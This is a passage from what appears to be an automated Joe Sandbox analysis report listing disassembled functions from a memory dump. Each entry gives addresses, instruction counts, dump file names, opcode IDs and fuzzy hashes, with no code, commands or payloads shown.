                                                                                              • Opcode ID: ffa7f32d6178f74ebd6a58b8ba94ee2a003ba202e9f1e8e9b8719b6ba3826fda
                                                                                              • Instruction ID: 552a5aa9ad05c2263ba7f5e098b77dc9772fbba51ea9df2a7b6839b968a7bdf9
                                                                                              • Opcode Fuzzy Hash: ffa7f32d6178f74ebd6a58b8ba94ee2a003ba202e9f1e8e9b8719b6ba3826fda
                                                                                              • Instruction Fuzzy Hash: 90C2D870A1991D8FDBA8EB58C8A5BA8B3F1FF58304F5141E9D00DD72A5CA75AE81CF40
                                                                                              Function 00007FFD9BAA3AE8 Relevance: .8, Instructions: 804COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 02dabf8d7adaba6a68ff813b5cf92d27e65f6e078f574d1c4007395286340e1c
                                                                                              • Instruction ID: 655aa3afaf63a69056e8dfa543a6dcba4f8d59524d460cf76abb2f6f1b0cc695
                                                                                              • Opcode Fuzzy Hash: 02dabf8d7adaba6a68ff813b5cf92d27e65f6e078f574d1c4007395286340e1c
                                                                                              • Instruction Fuzzy Hash: 8B52B330A0E78E8FE7A59F6488392F97FE1FF15310F0605BBE858C61A2DA786644C751
                                                                                              Function 00007FFD9BAA2FA8 Relevance: .8, Instructions: 767COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1efe15e43101dd4f3ab9eb3c795d6b0bf26ecdc6071a201989c2409d72069391
                                                                                              • Instruction ID: 33aed895f07740ba353b9fcf3b555d9ec57ff608c9f98c7f7ad343e935327497
                                                                                              • Opcode Fuzzy Hash: 1efe15e43101dd4f3ab9eb3c795d6b0bf26ecdc6071a201989c2409d72069391
                                                                                              • Instruction Fuzzy Hash: FD52C130A0E68E8FEB95EF6488696B97BF1FF19300F0105BED419C71A2DE78A644C751
                                                                                              Function 00007FFD9BAA3C59 Relevance: .7, Instructions: 662COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 05e60452dc3ce754d076f928874e188d5c5f245b763dee4acbe7ffe788938867
                                                                                              • Instruction ID: b19fbec46f7e623cf7565e7d7e6ddc8633335d8fa8bb06e6bf8896a6d63fdcc9
                                                                                              • Opcode Fuzzy Hash: 05e60452dc3ce754d076f928874e188d5c5f245b763dee4acbe7ffe788938867
                                                                                              • Instruction Fuzzy Hash: B832B430A0E78E8FEBA59F6488392F97BE1FF15310F0505BFE858C61A2DA786644C751
                                                                                              Function 00007FFD9BAA70E4 Relevance: .6, Instructions: 570COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eff3ea4849d00ae70e7566fb0f6bfce03b05b0cc274fb9c17b0ba053a15b4780
                                                                                              • Instruction ID: 712d4a705056efbfbe387c3a6489bcaf88fd3654b3a9c364820b1b68282c711f
                                                                                              • Opcode Fuzzy Hash: eff3ea4849d00ae70e7566fb0f6bfce03b05b0cc274fb9c17b0ba053a15b4780
                                                                                              • Instruction Fuzzy Hash: EA12C130A0E68E8FDB56EB64C8645FA7BF1FF06300F0205BBD419C71A2DA796A45C751
                                                                                              Function 00007FFD9BA9C798 Relevance: .4, Instructions: 396COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7cd26d40da8735753dea992c5e057027f9137f0dbdb1857843d62eefd34ed442
                                                                                              • Instruction ID: 9a159798bd6611bcdf6e00cd7445389a4ff665e406217a043f83fd3b53dbfb43
                                                                                              • Opcode Fuzzy Hash: 7cd26d40da8735753dea992c5e057027f9137f0dbdb1857843d62eefd34ed442
                                                                                              • Instruction Fuzzy Hash: 1ED1D130A0A64E8FEB68EF6488696BD7BF1FF19300F0145BAD41DC71A2DE786644CB51
                                                                                              Function 00007FFD9BAA4630 Relevance: .4, Instructions: 385COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 69490bec4169a56a9f9028053768ca55e5fb0df45750e2840c41e261aff8a30c
                                                                                              • Instruction ID: 322d4dd83803cbc5b103a6f0f540e277ed2d5fa5d012370cc76d8735878683fc
                                                                                              • Opcode Fuzzy Hash: 69490bec4169a56a9f9028053768ca55e5fb0df45750e2840c41e261aff8a30c
                                                                                              • Instruction Fuzzy Hash: F0D1E330A0A68E8FEB95EB64C8696BD7BE1FF19300F0145BEE419C70B2DE74A544C751
                                                                                              Function 00007FFD9BA9A26D Relevance: .3, Instructions: 340COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d92a963868645d8e0d60a6e8904e59d4a087290c31c2b1e6b90da4ec26f6f549
                                                                                              • Instruction ID: 3735adc7d2f6c76be8df6b9e54f6209081972d50fcfa24b3a04a07c98405df7e
                                                                                              • Opcode Fuzzy Hash: d92a963868645d8e0d60a6e8904e59d4a087290c31c2b1e6b90da4ec26f6f549
                                                                                              • Instruction Fuzzy Hash: 2CC1E034A0A68E8FD755EF64C8685FA7BB0FF5A304F0645FBD419C70A2DA78A644CB01
                                                                                              Function 00007FFD9BA9A808 Relevance: .3, Instructions: 338COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2974806a63bc7c195cd66b362af8451e4f3059198cf85898b4acd69c3991da6c
                                                                                              • Instruction ID: c485ea34f94621ae9135caa5acd30ffea049a35145a0c04f73b542410b947c8d
                                                                                              • Opcode Fuzzy Hash: 2974806a63bc7c195cd66b362af8451e4f3059198cf85898b4acd69c3991da6c
                                                                                              • Instruction Fuzzy Hash: 37B1AE30A0A64E8FEB95EF68C8696F97BF0FF19301F0105BAD419C71A6DB74A644CB40
                                                                                              Function 00007FFD9BA9DE92 Relevance: 5.2, Strings: 4, Instructions: 187COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $.$b$}
                                                                                              • API String ID: 0-188939175
                                                                                              • Opcode ID: 8e2d2f0c3725834f9cf3627adbda2c937e9f23462e5b02b92e95415229035be7
                                                                                              • Instruction ID: d1d03f6752a9e26f407f770db4aff209a347aede3975264cd55dab00ac16e3c5
                                                                                              • Opcode Fuzzy Hash: 8e2d2f0c3725834f9cf3627adbda2c937e9f23462e5b02b92e95415229035be7
                                                                                              • Instruction Fuzzy Hash: 7071B170E0962D8FDBA8DF58C8A47E9B7B1FB58301F1141EAD40EE2291CB746A84DF50
                                                                                              Function 00007FFD9BAA2A59 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: *S^I$R^s
                                                                                              • API String ID: 0-4097557823
                                                                                              • Opcode ID: 88f543034e8558df3a7c6b12d27fe123475d7a599f9b52c1b91a21e72fd1a932
                                                                                              • Instruction ID: 64a52f74d4af173f8f2d5b0fe898ec7e653e8e0472e5c6f8de36e7623a4df469
                                                                                              • Opcode Fuzzy Hash: 88f543034e8558df3a7c6b12d27fe123475d7a599f9b52c1b91a21e72fd1a932
                                                                                              • Instruction Fuzzy Hash: 50411922A0F3C50FE322A7B85C751E97FB5AF6622570D41FBD498CA0E3D9185949C3A1
                                                                                              Function 00007FFD9BA9C720 Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: *S^I$R^s
                                                                                              • API String ID: 0-4097557823
                                                                                              • Opcode ID: 888e71ada772b3cacc2114ed6c3d2f47b1fbc078340dc768415a9cda09d6ac0c
                                                                                              • Instruction ID: e3e2d57d7818886c1044af23fb5aaa2c2c73f3a3a2f3eef60956e12cb29928c4
                                                                                              • Opcode Fuzzy Hash: 888e71ada772b3cacc2114ed6c3d2f47b1fbc078340dc768415a9cda09d6ac0c
                                                                                              • Instruction Fuzzy Hash: F5413B22A0E7C50FE722EBF858791E87FA1EF55315B0941FBD498CA0E7D9246944C391
                                                                                              Function 00007FFD9BA9F2B0 Relevance: 2.5, Strings: 2, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !$d
                                                                                              • API String ID: 0-2113515810
                                                                                              • Opcode ID: f908a6c778f70d323190191177909e852781f43403898daff9c868aaf561ba70
                                                                                              • Instruction ID: e78738b2db3854db200918837bb0de0f7fe2f496e072fa5de743a5f899b7d19f
                                                                                              • Opcode Fuzzy Hash: f908a6c778f70d323190191177909e852781f43403898daff9c868aaf561ba70
                                                                                              • Instruction Fuzzy Hash: 5401A530A0966D8FDB69EF84D8A47A977B6BB54301F1501AAD00DE62A1CB786A84DF01
                                                                                              Function 00007FFD9BA9AA00 Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: qO_H
                                                                                              • API String ID: 0-3424999969
                                                                                              • Opcode ID: fe867acf27243caf7b38882cbb911333a8d27040e4b4df7b586a5cd12193f594
                                                                                              • Instruction ID: b1c5705353d8427be7989cfd263a8740ba5757b4878e959b6a459c3a08a36871
                                                                                              • Opcode Fuzzy Hash: fe867acf27243caf7b38882cbb911333a8d27040e4b4df7b586a5cd12193f594
                                                                                              • Instruction Fuzzy Hash: CB915E34E0A60E8FEB69EFA4C8697FD77F1FF05300F4145BAD409D21A1DA786A849B40
                                                                                              Function 00007FFD9BA9B2C4 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: qO_H
                                                                                              • API String ID: 0-3424999969
                                                                                              • Opcode ID: 691f84e219f74e7eb4877640efd5855f5e55852500ec73fd321885c68896dbf7
                                                                                              • Instruction ID: 1c5694a16a7a71773768e855ce80fdf752764c1c3034a1aa3cf080ff463ea96a
                                                                                              • Opcode Fuzzy Hash: 691f84e219f74e7eb4877640efd5855f5e55852500ec73fd321885c68896dbf7
                                                                                              • Instruction Fuzzy Hash: 0221D671E1661D8FEBA8DB68C8657EDB6B1FF18300F4101BAD40DE2261DB755A809F40
                                                                                              Function 00007FFD9BA9F665 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Z
                                                                                              • API String ID: 0-1505515367
                                                                                              • Opcode ID: 179a2a09e40b97146a247c150d393be74be2f41e2ead43f2bfd0f2b489a2e56e
                                                                                              • Instruction ID: 08c99c44f82763dc6bbbde8c32525177e9732e1c92905883dbe458def73bd2e9
                                                                                              • Opcode Fuzzy Hash: 179a2a09e40b97146a247c150d393be74be2f41e2ead43f2bfd0f2b489a2e56e
                                                                                              • Instruction Fuzzy Hash: 25012970A0A65ECEEB64DF54C8657A977A2FB54301F1102FAC10DD22A1CB782A85DB81
                                                                                              Function 00007FFD9BA9EBEA Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Z
                                                                                              • API String ID: 0-1505515367
                                                                                              • Opcode ID: 02320863a74a6f59c220c2ca0b14fddecad5b4ba79fe3924ea4d057aff7d65e3
                                                                                              • Instruction ID: 7bfae964441350a23921563042d7051900367541e0b2846986aaeb85a6c7398e
                                                                                              • Opcode Fuzzy Hash: 02320863a74a6f59c220c2ca0b14fddecad5b4ba79fe3924ea4d057aff7d65e3
                                                                                              • Instruction Fuzzy Hash: 31012871A0A55DCEDB64DF14C8657A977A2FB94301F1002FAC10DD22A1CB746A858B41
                                                                                              Function 00007FFD9BA9E37F Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !
                                                                                              • API String ID: 0-2657877971
                                                                                              • Opcode ID: fb75adcf7bcab10201706936d29191a6b91021910c8d74569836286434e11fd6
                                                                                              • Instruction ID: 843121fb8d9fc3f92ece18954c23945fd5ba281a510df2f6a81cada5bbbe9232
                                                                                              • Opcode Fuzzy Hash: fb75adcf7bcab10201706936d29191a6b91021910c8d74569836286434e11fd6
                                                                                              • Instruction Fuzzy Hash: 5E011930A09A6D8FDB68EF44C8A07B977B6FB54301F0501AAD00DE32A1CB786B84DF00
                                                                                              Function 00007FFD9BAA44FD Relevance: .6, Instructions: 626COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7a16755d88d16b913d28c76d2ed273fee20af5d4fdc00397780769cfaebd91b
                                                                                              • Instruction ID: 247131a54381e01e1900f7d9993517256e9974a6ba07b6a50a8899fd12f3bc4f
                                                                                              • Opcode Fuzzy Hash: a7a16755d88d16b913d28c76d2ed273fee20af5d4fdc00397780769cfaebd91b
                                                                                              • Instruction Fuzzy Hash: 27229330A0A68E4FEBA5EB6488656FD7BF1FF19300F0105BEE459C31B2DE7469448751
                                                                                              Function 00007FFD9BA9A890 Relevance: .5, Instructions: 490COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 711a3571fe2a168fc901b5e078ade93a5f3330933314b6990a880ad0ea7608df
                                                                                              • Instruction ID: fa07af481a0574817a0ed063290ad412410976e696951aa66a2dedfcdacb3afe
                                                                                              • Opcode Fuzzy Hash: 711a3571fe2a168fc901b5e078ade93a5f3330933314b6990a880ad0ea7608df
                                                                                              • Instruction Fuzzy Hash: 6D026D30E1965D8FEBA8EF68C8647B8B7B1FF58304F4141BAD05DD72A2CA746980DB41
                                                                                              Function 00007FFD9BAA2FD0 Relevance: .5, Instructions: 489COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3bf5ecebdc8bd11c2eb37cf81a10742ebd44495b331de9f8c864c51688e96533
                                                                                              • Instruction ID: 4a6e22687437af21ffae2f5788e16284b00f3c47953eeaf65be5453fb07f5721
                                                                                              • Opcode Fuzzy Hash: 3bf5ecebdc8bd11c2eb37cf81a10742ebd44495b331de9f8c864c51688e96533
                                                                                              • Instruction Fuzzy Hash: 9B02C330A0E68E8FEBA59F6488392F97BE1FF15310F0505BFE858C61B2DE7866448751
                                                                                              Function 00007FFD9BAA3EA9 Relevance: .5, Instructions: 488COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5dd8322259fac1d15d05ffd3bfd9e3cc9ce4a38116c4adb638cdf14588957594
                                                                                              • Instruction ID: 5862bd90e23275922799ffc6643652cdb82ac0fb2181ee8f388fdf48e9494558
                                                                                              • Opcode Fuzzy Hash: 5dd8322259fac1d15d05ffd3bfd9e3cc9ce4a38116c4adb638cdf14588957594
                                                                                              • Instruction Fuzzy Hash: D002C430A0E68E8FEBA59F6488392F97BE1FF15310F0505BFE858C61A2DE7866448751
                                                                                              Function 00007FFD9BAA51A8 Relevance: .5, Instructions: 482COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a9509db6980086fb8106e3861882fc0c26a035c0ccc8dabd53aa2930485b9a16
                                                                                              • Instruction ID: 02f59e1f40622b55f8140f105522011a41a4ecbc0d23d418171c369daf711221
                                                                                              • Opcode Fuzzy Hash: a9509db6980086fb8106e3861882fc0c26a035c0ccc8dabd53aa2930485b9a16
                                                                                              • Instruction Fuzzy Hash: E4D1F532B1EE4E0FDBA8DB5C98B56B973D2EF9831070502BAD40DC7296DE64ED458780
                                                                                              Function 00007FFD9BAA3F38 Relevance: .4, Instructions: 448COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 261ebcf6de3a9a7510eadee6ef6134b7d9a3ec12a77dd5285748195352d32dce
                                                                                              • Instruction ID: 9496bda5ad982949188eb70d21ab219c5a99cef0db780184309229703d616698
                                                                                              • Opcode Fuzzy Hash: 261ebcf6de3a9a7510eadee6ef6134b7d9a3ec12a77dd5285748195352d32dce
                                                                                              • Instruction Fuzzy Hash: 72F1D330A0E68E8FEBA59F6488392F97BE1FF15310F0505BFE858C61B2DE7866448751
                                                                                              Function 00007FFD9BAA2121 Relevance: .4, Instructions: 412COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0935170f1973c305209759272f4217ddae33175dd5b34bde657a1032f7070f5b
                                                                                              • Instruction ID: 3e2a2c5f74b943e69accf94d22babb0dc7e86c690ab38236e6c687e836e0e32e
                                                                                              • Opcode Fuzzy Hash: 0935170f1973c305209759272f4217ddae33175dd5b34bde657a1032f7070f5b
                                                                                              • Instruction Fuzzy Hash: DAE10A70E0961D8FDB64EFA4C8657EDBBB1FF59300F0141BAD00DE7292DA786A858B50
                                                                                              Function 00007FFD9BAA3FD9 Relevance: .4, Instructions: 400COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f4fca4a6e7c4d16d3f523844217b704c3276b7c3d003ed321f8803a3cb8c5cdb
                                                                                              • Instruction ID: 0001cd6bc7433540e8b186bc2fc5f26a458c6d285dac56ce68c15429edc9f81b
                                                                                              • Opcode Fuzzy Hash: f4fca4a6e7c4d16d3f523844217b704c3276b7c3d003ed321f8803a3cb8c5cdb
                                                                                              • Instruction Fuzzy Hash: 42D1F530A0E78E8FEBA59B6488352F97BE1FF15310F0501BFE858C61B2DE6866448751
                                                                                              Function 00007FFD9BAA1380 Relevance: .4, Instructions: 388COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 630f255d10aef71eef6e115fdf65cacca41a0eb7e14e9b51765247f8ad7f1f4f
                                                                                              • Instruction ID: 47c7b1dda467f58d9c4e72e5e84d0c74fd3b8c9706703ac3fcfb096d7a6f38d1
                                                                                              • Opcode Fuzzy Hash: 630f255d10aef71eef6e115fdf65cacca41a0eb7e14e9b51765247f8ad7f1f4f
                                                                                              • Instruction Fuzzy Hash: 3DE1D27190E3CA8FDB569F6488756E93FB1AF27300F0A01EBD484CB1A3D678A654C751
                                                                                              Function 00007FFD9BA92CC2 Relevance: .4, Instructions: 381COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b6c7551b9847e828254ec230dc2b10f1a12479a5afbb6530c09e2091305502f0
                                                                                              • Instruction ID: 0e7d5891e3d366b94060a64560e1397499e746ad56b948abcf0ecd4454c11eaf
                                                                                              • Opcode Fuzzy Hash: b6c7551b9847e828254ec230dc2b10f1a12479a5afbb6530c09e2091305502f0
                                                                                              • Instruction Fuzzy Hash: 43C1B431E0E74E8FE765EBA8C8699E97BE0FF15300F0645B6D408C70B6DA78A648D741
                                                                                              Function 00007FFD9BA9D21A Relevance: .4, Instructions: 380COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 42bd166e7f4c10d914342de3b1ca3a680214813f3af673c8f98c9d84a8fca6a8
                                                                                              • Instruction ID: 052906904466383ab9575ac1a070149142e0f726ca6f20ee39b32269a5cd80f7
                                                                                              • Opcode Fuzzy Hash: 42bd166e7f4c10d914342de3b1ca3a680214813f3af673c8f98c9d84a8fca6a8
                                                                                              • Instruction Fuzzy Hash: 63D1A031A19A4D8FEBA8EF58C8647B8B7A1FF58304F4101BAD04DD71E2CE786984DB01
                                                                                              Function 00007FFD9BAA0120 Relevance: .4, Instructions: 358COMMON
                                                                                              Download Yara Rule
